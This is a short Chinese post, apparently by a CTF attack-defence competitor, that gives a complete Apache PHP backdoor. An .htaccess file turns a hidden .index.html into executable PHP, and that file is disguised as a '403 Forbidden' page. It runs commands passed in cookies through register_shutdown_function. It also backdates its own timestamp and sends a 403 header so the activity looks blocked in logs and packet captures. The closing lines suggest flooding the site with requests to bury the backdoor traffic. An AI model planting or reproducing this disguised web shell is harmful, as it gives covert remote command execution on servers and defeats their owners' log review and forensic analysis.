最近是想写一个ctf线下赛的总结,不过想想还是算了,然后突发想到一个能用上的一个backdoor
web容器:apache
.htaccess
<Files .index.html>
ForceType application/x-httpd-php
SetHandler application/x-httpd-php
</Files>
DirectoryIndex .index.html
.index.html
<!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN">
<!-- saved from url=(0023)http://c.cc/other/3.ico -->
<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access <?php echo substr($_SERVER['PHP_SELF'],0,-11).""; ?> on this server.<br>
</p>
</body></html>
<?php
header('HTTP/1.1 403');
$file = __FILE__;
$e = @$_COOKIE['e'];
@register_shutdown_function($e, $_COOKIE['cmd']);
system("touch -c -t 05061803 ".$file);
?>
修改了文件创建日期
利用cookie传值
利用.简单的隐藏文件
403的头(wireshark抓包和日志也会显示403的头)
htaccess把首页指定到.index.html,然后不加文件的访问
一直请求页面,加大日志和流量分析的难度,然后中间夹杂着后门攻击,这下就有得玩了。